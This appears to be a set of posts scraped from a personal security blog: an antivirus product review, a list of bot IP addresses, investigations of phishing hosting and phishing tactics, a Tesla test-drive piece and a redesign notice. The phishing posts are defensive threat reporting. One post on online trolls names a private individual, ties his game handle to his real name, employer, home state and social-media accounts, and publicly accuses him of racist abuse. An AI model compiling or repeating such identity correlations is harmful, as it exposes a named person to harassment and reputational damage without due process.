  • Deployment tools were adequate in that there were no major issues with installing, uninstalling or deploying the files. Minimal interruption or notices to the machine when pushing it down with a script. Removal from the console happens in under 15 minutes on most machines.
  • Panda’s support is phenomenal despite us having many bugs with it on our particular platform that was available to test. They responded quickly and with haste. During our support they offered access to an early release version of Panda AD360 8.x as a way to get past known issues on v7.

Issues we worked with support on:

  • Crashing/Bluescreens – Panda caused many bug checks on my machines with the driver NNSPRV.SYS, and by many I mean over a dozen on multiple machines. The key for some was that they were running Intel Proset Drivers for Wireless on a slightly older version but I can not fully confirm that’s the cause. The crashes continued until we were put on an early release of version 8.0 that seemed to alleviate them. At the time though this was not a general release. Every dump had references to Panda drives in it when the crashes occurred and they happened often.

  • Performance Issues/Hangups – Machine slowdowns on several boxes that include severe delays opening applications. This happened several more times in the last few months with the most recent being on my own machine while I was using it. I captured video of this and called in to offer an impacted machine to Panda. They were unavailable to gather any data and did not recommend any steps to take on the machine at that time. I had to remove the product and could not wait until ‘tomorrow’ to find out what I needed to do. That issue is still not identified or resolved. The burden was on me to prove that this is an issue even though I’ve captured live video of it happening multiple times. Panda was using 10,000 handles on PSANHOST.EXE when the issue occurs. Chrome tabs were completely hung up and simple applications like Notepad.exe took more than a minute to open. The issue was immediately resolved by removing the AV – which by the way was so hung up it took about 30 minutes. After the removal, we could immediately surf the web, and open up applications.
  • Service instability – Panda services were crashing on version 7.x-8.x randomly. We detected this in the monitoring of its services, and the issue impacts the latest version. Support requested that we manually gather using a dump tool for them to access the issue. The main service controlling Panda crashes and says ‘The Panda Endpoint Administration Agent service terminated unexpectedly’ on these machines. There is no fix or explanation for this issue, and it’s separate from the ones shown above. We don’t know why the service keeps crashing off or what to do next. Even if we did, we believe that this ‘broken agent’ issue leads to decreased security for those endpoints when they aren’t able to update or communicate properly. A lot of time being spent manually reinstalling agents to fix this issue.
  • Upgrade Issues – Panda also failed to upgrade from v7 to v8 automatically on around 25% of the computers creating a situation where it was ‘broken’ and not functional. There was, of course, a fix or method for support to help us but it was manual, involved remoting into each machine and again the upgrade just didn’t work without any explanation. Many of the computers have rebooted numerous times and get repeatedly prompted to ‘Upgrade Panda’ when they’ve accepted that menu over and over. Meanwhile, the agents did not have full protection because the install was technically broken between versions.

 (Panda Support)

  • Dropper Detection / Kill Chain Issues – None of the files I opened with Malicious Word Macros were detected until the actual payload ran. Panda did not detect many files on-access but only once they ran and down the line in the attack chain. It will stop the PowerShell command from running but only at the point of execution. A little too close for comfort especially when many other tools see the evil in the Macro’s and malware code embedded in the document. Out of a dozen files of so I got live from the internet, none of the droppers triggered an alert until they tried something fishy. Panda was quick about adding them as a generic type of alert when I sent in samples. There is no automated system or method to submit samples to Panda w/o manually opening an e-mail ticket. Panda’s ‘EDR’ type execution report fails to correlate the malicious .doc I opened and only ‘sees’ the Powershell. But what ran the command? What were the parameters?

 ( Panda Support)

  • False Positives – We found that Panda would trigger on innocuous Windows 10 processes like those that update the Windows Store applications. In some cases it labeled them as ‘potentially malicious’ and in lock mode, it halted execution while it could determine if they were true positive malicious. This wasn’t the only ‘system’ type file and we encountered many more with Nvidia and a driver from Intel.
  • Web Filtering / Phishing – Many of the Malware and Phishing URLs I attempted to visit wasn’t classified by the software. During my investigation of the ‘Master Angler’ story this month I had Panda running and it never blocked any of the URLs. I submitted a URL to Panda with my blog and they added that single address but no others that were obviously running off that same IP. After reporting many of these URLs to Panda I realized that the phishing protection was outsourced to Cyren and not using its own threat intelligence.
  • Buggy Alerting- Malware alerts were configured for the web and alerted directly from the IP via SMTP to my e-mail server kind of strange. Not only that but there were still variables in the e-mail that was unresolved like {ExtendedUrlMalwareinfo}. The other issue was that I’d get tons of duplicates with the same information may be 5-10 e-mails in a blast from a single machine visiting a site. It says ‘Virus deleted’ but I couldn’t find anything malicious on some of these sites.

  • Console Outages –  Web console has issues on several occasions with server-side errors that prevented me from logging in. At this exact moment I keep logging in but it tells me for security reasons my session is timed out

  • Cookie Alarm – Panda sent alerts for cookies detected on machines and I couldn’t turn it off. There was no way to whitelist or otherwise exclude this extra noise.

        

 

Bad Bots – Headless Chrome

Bad Bots – Headless Chrome

No Comments

There’s never a shortage of bad bots and unidentifiable applications that crawl websites. Are they scraping the content? Updating it for some unnamed organization’s news site? Storing an archive of it? It’s not clear, as they typically won’t identify themselves with a legitimate robot-type user agent.

One group of firewall logs recently caught my eye for a few reasons. The first reason was that, similar to my issue with OVH Hosting in a previous blog, there were numerous clients connecting simultaneously with the same user agent. At any given time, 3 to 5 of these hosts would be crawling information, like tags and posts, off of the site. Viewing the visitors live, I saw that a high percentage of the IPs below were all using the same user agent.

Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/64.0.3282.119 Safari/537.36

Here’s a copy of the Firewall log where I set up a rule to do an extended browser validation using javascript:

Does anybody know the purpose and source of these connections? Did you end up here by searching of the IPs? All of the subnets below belong to Amazon Technologies and could possibly be connected behind the scenes on Amazon Web Services.

100+ IP Addresses recorded in the month of July:

18.236.120.18
18.236.243.214
18.237.41.164
18.237.61.143
18.237.123.0
34.208.40.36
34.208.92.220
34.208.141.124
34.208.235.48
34.209.44.200
34.209.114.64
34.209.227.101
34.210.78.254
34.210.100.217
34.210.221.104
34.211.25.220
34.211.190.187
34.211.227.196
34.212.71.188
34.212.116.241
34.212.131.138
34.214.150.53
34.215.152.137
34.216.26.43
34.217.14.63
34.217.50.13
34.217.107.188
34.218.250.187
34.219.11.198
34.219.39.87
34.219.92.251
34.219.141.108
34.219.193.58
34.219.225.182
34.220.16.137
34.220.59.162
34.220.80.254
34.220.103.78
34.220.148.196
34.220.188.241
34.220.199.88
34.220.224.29
34.221.7.4
34.221.22.134
34.221.32.36
34.221.58.141
34.221.77.132
34.221.142.89
34.221.164.175
34.221.241.244
34.221.242.167
35.160.27.133
35.160.98.44
35.161.21.171
35.162.116.37
35.164.15.117
35.164.69.206
35.164.100.206
35.165.242.232
35.166.95.89
35.166.178.125
35.172.212.99
52.10.12.227
52.12.129.255
52.13.68.33
52.13.80.33
52.25.232.118
52.27.65.70
52.34.53.176
52.35.81.218
52.35.124.32
52.36.59.177
52.38.5.86
52.38.39.61
52.40.23.116
52.40.76.8
52.41.164.108
52.89.45.141
54.68.182.6
54.70.12.254
54.70.144.155
54.148.14.116
54.149.73.177
54.184.19.153
54.185.147.189
54.186.70.168
54.187.36.97
54.187.196.207
54.190.184.2
54.191.111.154
54.191.111.220
54.191.197.179
54.200.246.200
54.201.191.42
54.201.229.227
54.202.84.215
54.202.248.143
54.212.211.34
54.213.15.127
54.213.61.104
54.213.242.152
54.218.1.204
54.218.84.30
54.218.112.201
54.244.15.175
54.244.37.100
54.245.26.75
54.245.183.44
91.213.143.248
167.99.167.226

Phishing – A Master Anglers Toolbox

Phishing – A Master Anglers Toolbox

We recently came across a researchers gold mine of phishing sites. It all started with a PDF file received via an email called Post-Label.  The file itself is harmless, but it links to the USPS scam shown below in the screenshots.

USPS-Phishing

Further analysis of this IP found that it belongs to QuadraNet a colocation provider who’s only involved in hosting physical servers for its clients. The service is being provided to AlphaRacks a VPS provider that rents out computing space by offering to host to its clients. QuadraNet is no stranger to Malware and C&C being #8 of the top 10 worst Spam ISPs.

VirusTotal has a ton of sites being hosted off this box, and almost an unbelievable amount of phishing pages and malware. We found more than 60 different brands being phished off this one IP address. The activity goes back to March 2018. It’s a phenomenon I call ‘hiding in plain sight,’ and that’s because vendors have been detecting the issue for many months, but no one has taken the initiative to file an abuse report.

We filed an abuse report and QuadraNet is now aware of the issue. They’ve committed to cutting off access from this IP if the client does not respond within a period of time and clean up the phishing sites. We’ve included numerous updates below as to the progress of the cleanup below just before the screenshots we have collected over a period of months.

https://www.virustotal.com/#/ip-address/162.220.11.2

https://www.virustotal.com/#/ip-address/167.160.188.2 (Added 10/2018. New IP owned by Alpharacks)

URLScan provides regular screenshots of the activity hosted on various domains at this IP address. I’ve seen hundreds and potentially thousands of domains pointing to this location over the last several months.

https://urlscan.io/ip/162.220.11.2

https://urlscan.io/ip/167.160.188.2

https://www.abuseipdb.com/check/162.220.11.2

https://checkphish.ai reports 1,945 phishing URLs have been observed off of this address.

Brands being phished include CIBC Bank, DHL, GoDaddy, Microsoft Live, Office 365, OneDrive, Outlook Web Access, PayPal, USPS, 50+  others all on a single IP. This is a master angler at work, folks!

Victims we’ve seen phishing attempts against the companies below. This is is not a confirmation that they were compromised only that they scanned a URL with an e-mail inside of it so we presume that the owner received it via inbound phishing e-mail. Keep in mind this list only represents a small portion of the recipients and just a couple of days worth of URLs being scanned on VirusTotal:

Australia and New Zealand Bank
Aditya Birla Group
Conrad Hotels
Ericsson
Fox Broadcasting
Huawei
KPMG
Owens Corning
PotashCorp
QBE Insurance Group
Reebok
Regus
Seagate
State of Minnesota
Tetra Pak
Toyota
The Linde Group
VF Corporation
Volvo

NOTE: Some of this research is incomplete and should be investigated further by other researchers. I tend to post these kinds of ‘live’ hacks quickly, to get the word out and let folks experiment a bit before the hackers are shut down. The first thing I did was notify the hosting provider, so the clock is ticking. Or maybe it’s not, depending on how well they handle abuse complaints.

E-mail possibly associated with activity: [email protected] 

Dozens of the sites have login pages for the Pony Botnet:


Updates:

11/19 – New IP address observed 167.160.188.2 owned by Alpharacks and has an equivalent amount of scam websites up and running.

10/16 – We will allow the provider Quadranet to continue working with its client to remediate the issue.

9/17 – Activity continues and no response from ‘[email protected]‘ or Quadranet.

8/21 – Quadranet has reportedly taken action against AlphaRacks by null-routing it’s IP again due to the abuse. IP was responding again a short time later.

 8/14 – IP still has dozens of phishing sites, malware binaries and botnet communication files hosted on it. I’ve been e-mailing this information to the upstream provider who is QuadraNet. The co-location customer this IP belongs to either doesn’t have the time to keep an eye on this, or doesn’t know how to stop these phisherman. It’s also possible the server is compromised or that the operator AlphaRacks is complicit in the activity. I found that the blocks used to be owned by Crissic Solutions (Skylar MacMinn, Germany) who both worked at Quadranet and occupied the same IP space. An unknown entity was selling AlphaRacks on a web forum about 4 years ago at post#1 post#2.

8/7 – IP continues to host phishing activity. We have reported additional sites to QuadraNet who will presumably notify the colocation client again. Keep in mind we noticed this activity start trending upward in March of 2018. Obviously, they’ve been outsmarting both of these parties for a good deal of time nearly half of 2018.

7/23QuadraNet has notified me that they are going to “null-route the IP address and reach out to our customer, they may not have been aware of the number of domains involved.” after they had repeatedly asked the customer to disable these services. IP went down and was back up within a few hours. We confirmed it still had 5+ phishing sites live on it and reported that back to QuadraNet. We suspect the client is Alpharacks Hosting and that up to 1,200 domains may be on this server most of the malicious.

Screenshots below:

I’ve reported this to the Quadranet, and PhishTank. Google Chrome warned against visiting many of these sites hosted on this IP.

Phishing – New Tactics and Techniques

Phishing – New Tactics and Techniques

We’ve recently observed a new trend with phishing and targeted malware attacks that use domains to bypass anti-spam. The attackers are using valid domains, SPF, SMTP, and reply addresses that mimic newsletter bouncebacks. These tactics allow the messages to bypass reputational and other types of checks.

The attachments are typical droppers, highly obfuscated and using Microsoft Word macros. Attachments were known under names such as Trojan-Downloader, VBA.Agent, and Exploit.Siggen leveraging Office CVE-2017-0199.

Domains w/ Virustotal link:

DocuSign – docusign.delivery

Bank Of America – securemsg-bankofamerica.com

Internal Revenue Service – irsinvoice.com

Dunn & Bradstreet – dnbdocuments.com

Tactics and Techniques:

Attackers are using return addresses that resemble a real newsletter bounceback.

SPF records exist for the domain, and they match the servers that send the targeted emails. They are online, answering to SMTP connections that use the appropriate banner for the website.

Attackers are using VPS or full service hosting accounts to launch attacks like LeaseWeb and Secure Servers LLC. Devices have remote administration ports and services open.

Incoming emails are highly obfuscated by a randomly generated Word document with macros. Attackers will change payload if a “virus” message is received. If it’s a RBL message, they will switch to another SMTP address and continue to hammer the system until it allows a delivery. Messages are modified near real-time after each rejection, until one is accepted.

Fighting Back:

If I had not configured a HOLD on documents with macros, these would have been delivered by my spam provider. I had an option configured to recognize “Newly Observed Domain,” but it didn’t recognize them, and it wasn’t set to block them. It may be a good idea to inspect these manually, or you could put in some kind of workflow for content examination to alert you when they are delivered. I’m looking for keywords like the ones below, and I’m also scanning some of the messages:

Account Locked
EFax
Hello Dear
Parcel
Password Reset
Shipment
Suspended Account
Unusual Sign-In

 

Domain #1

docusign.delivery

 

Domain record shows that it was registered today:

Here’s the SPF record for docusign.delivery:

SMTP server at the host answers on behalf of this domain as well for spam filters that form a connection back to the system during validation:

The sender passes SPF checks because they’re using a legitimate domain:

spf=pass (spfCheck: domain of docusign.delivery designates 95.211.148.208 as permitted sender) client-ip=95.211.148.208; [email protected]y; helo=docusign.delivery
Content-Type: multipart/mixed;

 

Nmap results show smtp/25 is open, and proxy/8080 is listening. Neither is an open relay, so we assume the attacker configured for quick remote access and spamming:

 

Email content was a word document:

Content-Disposition: attachment; filename="3873JDSB987391.doc"
Content-Transfer-Encoding: base64
Content-Type: application/msword; name="3873JDSB987391.doc"

Domain #2

securemsg-bankofamerica.com

 

SPF:

 

Domain #3

IRSInvoice.com

 

SPF:

Domain #4

DNBDocuments.com

 

Trolling – Hate and Video Games

Trolling – Hate and Video Games

No Comments

I started thinking about this topic, and ultimately a blog, when a troll was repeatedly scrolling the “N” word on a video game I was playing last night. What’s more, this person felt comfortable doing it in front of 64+ other folks of unknown age, or ethnic backgrounds who were playing the game with us! I thought to myself, who are these trolls? What drives them? Do they have jobs or a family? I got the sense that hate goes deep into the psyche of the individual. I often times wonder, do they feel the way they hate? Or, do they hate the way that they feel?

.

If your attitude informs behavior, then typing that word over and over means that you are:

  1. Clearly racist, and
  2. Feeling untouchable because you are on the internet.

Just for kicks, I made a simple investigation into this person via public databases like Google and other websites. The most interesting thing was that the nickname he used seemed to be a real name, not a typical handle like “deathwarriorbot.” Well, that piqued my interest, and it didn’t take long to find out who may have allegedly been behind the hate – read on, and I’ll tell you what I found.

It’s official that the internet has become a cesspool of carbon copy trolls. There are many ways hate speech spreads online, and it seems to be getting worse. Twitter users line up to target people, and then anonymously rip them to shreds for fun and good times. It’s a psychological warfare, and these seemingly anonymous trolls have flourished in an environment of little accountability. I know quite a bit about trolling, especially since I hacked from the early 90s until the mid-2000s; in fact, many of us trolls were hackers, information gatherers, and pranksters. We’d make phone calls to friends and other individuals, playing various jokes, some cruel, but nothing that could ruin a person’s life, and we’d never use hate speech to attack others. Sites like Twitter have given just about everyone a “voice” and can be highly politicized at times, littered with pure hate and negativity. Remember the old saying “Opinions are like a**holes, everybody has one”? Well, it’s true, and while I support free speech, I don’t condone speech that is hateful or intolerant. Honestly, I don’t like to read any comments nowadays, given the climate of trolls who are hate mongers.

It seems with the rapid growth of the internet, many of these people don’t care about being anonymous, as long as they can broadcast their message. There’s plenty of coverage on the psychology of why they do this, and on how the internet makes them feel powerful. I know this firsthand, as I’ve seen more than one Twitter or YouTube that has little to no followers or hits – but they carry on as if they’re on a podium of power, albeit a tiny one. Does that stop these people from thinking that somebody is listening? No. I don’t know what they call the disorder of having a disproportionate belief about your perceived power online versus offline, but I bet it’s hard to pronounce.

For example, in the political realm, a person’s beliefs seem to unconsciously be a part of his or her identity. If you attack a political figure, it is perceived as if you are attacking them directly at the core of what they believe. Attackers become stereotypical gang members who can take down any target at will. They preach division, not inclusion, and I think most of the time we have no idea who they really are. And because there’s proof that Russia and other countries have been behind many efforts to sway U.S. public opinion, it’s obvious that they do not reflect who we are as Americans – if they are from the U.S. at all.

To quote a favorite author of mine, Alan Weiss, from his Balancing Act blogs, “The human condition is not necessarily one of polarization. While tribes and cultures have been fighting for land and resources and power for millennia, they have also been able to come together for mutual benefit. The right to disagree, debate, and demur is important, even vital. But the belief that you’re with us or against us, you’re friend or enemy, is absurd. Despite the fact we may agree on a hundred other issues, this one issue creates an impregnable divide? Like the starship Enterprise, the emotional “shields” descend and prevent rational discourse and even logic from penetrating. You’re the “enemy,” so I have no intention of listening. Confirmation bias is viciously in play with highly emotional subjects: climate change, abortion, vivisection, politics, health care, welfare, education. That’s because passionate beliefs need to be shored up at all costs, and were reluctant to listen to evidence to the contrary with any objectivity at all. We need to stop searching solely for opinion and information that support our point of view (which is most of the activity on Facebook, by the way). As intelligent beings, we owe it to ourselves and our society to deliberately pursue varied points of view to draw our own rational conclusions.” I couldn’t have said it better, and I didn’t try.

So what can we do about trolls? Report them? Shame them publicly? Invite them to an MMA fight to ‘work things out’? I’d love that, but cowards typically won’t reveal themselves. It takes away their power when you can identify them, and for a troll, having the ‘docs’ on somebody is the ultimate weapon. It usually goes from politics to ad hominem (against the person), as you have to remember, this is about the ego defending one’s personal ‘identity.’. Nowadays, ignorant, intolerant college students shout at and shut down speakers with whom they disagree. What’s wrong with these students? Maybe we need accountability by lifting the mask of who’s behind the hate, and then it will be more apparent to trolls that their actions have consequences.

Now, on to the incident from last night… Note: there is explicit content in a racial slur, shown in a screenshot below.

Unmasking the Hate

Disclaimer: The information provided is as-is, and we do not condone the harassment of any individual, or hate speech. We are not stating it is a fact that this person conducted these activities, only sharing screenshots of a correlation between the name on this game, and what was found on Google. We are not ‘attacking’ this person, merely following a logical investigative path to uncover information. We are not accusing them of a crime, or wrongdoing. Do not attempt to call, e-mail, tweet, or harass this person based on this information. The purpose of providing this information is to offer a perspective into a situation that I directly witnessed, and impacted me personally. I’ve only compiled information from Google searches and added the perspective of any typical internet user.

*** Update 11/7/2018 – Ran into Nathan again on his foul racist tear in the game Battlefield. In this case I prompted him, “Nathan, why are you so mad?” to which we answered (confirming that he is infact Nathan at the helm) that it’s “because of noobs”.


Original Story:

Screenshot of a user ‘NthnKirsch2’ writing vulgarities over and over, an estimated 100 times throughout the game in Battlefield 4, shown below:

Wait, there’s a twitter @nthnkirsch2, what are the odds? Probably just a coincidence, I mean we can’t confirm this guy is the same person, right?

Support for politics correlates with another comment on Steve Bannon

Hmm, the account for his game below seems to have the same picture. But hey, maybe it’s just another coincidence. Oh wait, it could be that a family member uses the account. Maybe a bad little brother, I mean that would explain it, right?

It looks like somebody using Nathan’s account petitioned to have a ban removed, for guess what? None other than racial slurs. This happened back in 2014, so either his “little brother” (Nathan was 34 at the time) is back with a vengeance, trying to throw dirt on his name, or it’s a cover-up.

In the blog posting, there’s a reference linking the alias nthnkirsch1, a member of steam that says the user is from North Carolina. This is important because in the Linkedin below the primary education of the user is Duke University, located in North Carolina. There is another Nathan I found in NC, and he’s still in college not a 38-year-old male, like what is shown above.

Instagram account forms another nexus between nthnkirsch1 and nthnkirsch2.

It seems like this hateful user shares a bit of ‘gaming rage’ with his little brother (if he actually exists). Earlier this year was complaining about hacks, cheaters, and issues using the game. This is similar to the comments in the game of ‘nice hack’, seems to fit pretty well with the first image:

Found a comment here with hate speech by user Nthnkirsch2:

Here’s a facebook, which we assume is the same, Nathan. He’s living in PA, and self-employed.

A quick search on LinkedIn finds a one Nathan Kirsch, from PA. Unless there are two Nathan Kirsch’s in the same town in PA? He appears well educated from Duke (North Carolina) for a person spewing this kind of racism (little brother?), and is currently the CEO at Radon Be Gone primarily serving people in Colorado, Idaho, Montana, Nevada, and Wyoming.

Confirmed by other information available on the internet, simply by searching the name we found in the game, nothing more. If Nathan is the one perpetrating this hate, then he hasn’t done much to cover up his tracks.

Any comments from Nathan Kirsch or Radon Be Gone? I’d be happy to discuss, and post your thoughts on the issue. Please advise, as I’d like for myself (and my little family members) to play a game without being exposed to hate speech. Nathan, if this was you I hope it’s a lesson that not only should you be more careful about using your real name and maybe have a bit of compassion for people of color. Something hateful is inside of you, and it seems to have been festering for a while. Why do you attack other people? What makes you so angry? If it was Nathan’s little brother he’s been at this for years now based on what we found online. I think it might be time for him to create his own accounts, and stop using the good name of his big brother.

I’m wondering if can people like this can change – or become better by accepting a love for diversity? It’s hard to say, but I felt like using my voice here could shine a light on this issue, and show you that not all trolls are immature 12-year-old gamers who are not worth looking into. Some of these trolls and hate speech advocates appear to be well-educated CEOs, and they seem to have nothing better to do than spread hate – a clearly unsustainable way to live in the melting pot we call America.

Trolls just want to have fun, and unfortunately for them, that correlates strongly with sadism, psychopathy, and Machiavellianism. 

Tesla – Model 3 Test Drive and Winning Big

Tesla – Model 3 Test Drive and Winning Big

No Comments

In recent news, people who wouldn’t ordinarily care about cars are obsessing about the numbers of Tesla, a billion dollar corporation. They’re laying down strategies and pleading on Twitter with Elon Musk to see things another way. But will he? Should he?

Let me ask you something – when was the last time you spent more than your salary on a bet, like starting a business or perhaps an investment, where you directly contributed to the end goal? I think the vast majority of people would say that they have never done it and that they don’t know the first thing about managing themselves, never mind operating a company with 30k employees. Not only is it almost inconceivable from that perspective, it’s impossible to fully comprehend.

That’s why people with no money or experience in the auto industry can have a voice going play-by-play with Tesla on the internet. The news is promoting negative outlooks, and I think the advice is formulated for investors – not the long-term successes but the short-term payouts. All you have to do is read the news to drown in the numbers on last week’s growth. But who’s controlling the narrative, the investors? How about propaganda from the competition? Renowned Twitter experts can see that 3,750 + 1,250 (25% more) = 5,000, which is their calculated proof of the company’s future outlook. It’s simple, right? Let me try to break this down, at least from the tiny window we all look through while trying to figure out what’s going on inside of Tesla. Mind you, I’ve done little research, but I keep up with the barebones facts and Tesla’s statements, in general.

Tesla’s Fremont manufacturing plant was aiming to produce 2,500 cars per day. This was less than 90 days ago and under a different leadership. It looks to me like Elon is doing what most leaders can’t and won’t do – he’s getting out of the office chair and down on the production floor to see his goals come to fruition. It’s exciting and awe-inspiring. I’d be honored to work there right alongside him in that battle.

The problem with these news reports is that they’re from the perspective of contributors who are hung-up in their own concerns (When can I leave?? 5 pm? Ugh!), and have limited visibility into the big picture. I’m sure the guy in the paint shop knows a ton about what’s going on, and I trust his casual observations from the floor without any question or hesitation. Wait, isn’t he supposed to be busy painting? The Fremont location alone has increased by 4,000 employees since June of 2016. Most of the haters Tesla talks about are either:

  1. Betting on the losses,
  2. Working with the competition, or
  3. Not qualified or informed enough to make an assessment.

Or maybe I’m just optimistic. I know what it’s like to work hard when everybody around you is doubtful, cynical, and spreading the worst outlook possible.

The Model 3 isn’t a myth. It’s a reality, and I know so because I drove a privately owned one recently for 3-4 days (VIN #9257). I’ve owned a variety of vehicles including Infiniti, Chrysler, Pontiac, Lincoln, Ford, and several others. In the last few years, I’ve rented at least 100 cars including Audi, BMW, Fiat, Mercedes, Lexus, Cadillac, Volkswagen, Subaru, Dodge, and the list goes on. Generally, the vehicles would have cost anywhere from $30k-$70k. I used these during my travels and would casually leverage a significant discount (50%) that I have with one company that’s local to my area. I’m not an expert on cars, but I have driven many of them, especially recently, so I know how frustrating all the quirks can be every time I change models and drive a different car around for two-and-a-half years. I’ve been frustrated by the unknown and puzzled by features, even where to pop the gas tank. How about Bluetooth issues? Ever reboot your phone or pair it five times to hear just five minutes of music? I’ve had dead batteries, overheating engines, and cars from hell that wouldn’t drive straight. And the majority of them were new cars with 0-20k miles!

The Model 3 was smooth on user experience, had tons of torque, and generally was fun to drive, unlike many other small, cramped, uncomfortable cars. I took several trips from Providence to Boston and back, only needing to recharge one time, and I started the trips with 20% battery. The technology was great and offered one of the most intuitive NAV experiences I’ve had to date. The car was just online, not tethering or using my phone as a hotspot. Tesla knows that small things make a difference, and the way the OS was set up is very intuitive. Overall, this car is reliable, and I’d be happy to own it after some time passes with the first generations. I think the key is just jumping in one and driving it on your terms. I highly recommend Turo.com for that, and then, only then, should you render an opinion. You could read about them for days and look at every picture of them on the internet. Just get in one and get going. They rock!

Whether you bet for or against Tesla, they are still a winner. The company is about disruption and pushing the limits, done in the spirit of being up against impossible odds. The story is just as exciting to me without having to know or consider thinking about how it will end.

Also see: The War on Tesla, Musk, and the Fight for the Future

 

Overview:

Long Range Battery (310mi.) (500km)

Premium Upgrades (full glass roof, heated seats, etc.)

0-60mph in 5.1 seconds

Enhanced Autopilot features: Lane Change Autosteer Side Collision Warning Summon (coming soon) Automatic Parking Emergency Braking

 

 

New Blog Design – Coming in July

New Blog Design – Coming in July

Finishing up the final code for my 2018 redesign. My desk is getting a facelift, and there will be a fully responsive mobile site. I’ve been patching all the leaks and covering up code issues with various plug-ins, CDNs, and enhancements for far too long. I need to focus on device compatibility, and most importantly the readability of the blog. Fonts, colors, the background should be adjusted to be easier on the eyes. I hope you enjoy it, and I’ll work to take more time to write useful content. I’m also working with an editor to proofread and organize my content better.

Note: I’ve actually got a bamboo top Jarvis Sit-Stand, Back App Chair, Dual Monitor Arm, 2x Dell S2318H, Contour Unimouse, RollerMouse Red, Logitech Z623Google Pixel2, Dell XPS 8390, Dell Latitude E5480, VSL188NC desk lamp, and 2 layers of 4x cheapo interlocking floor squares.

Thanks for reading, and stay safe.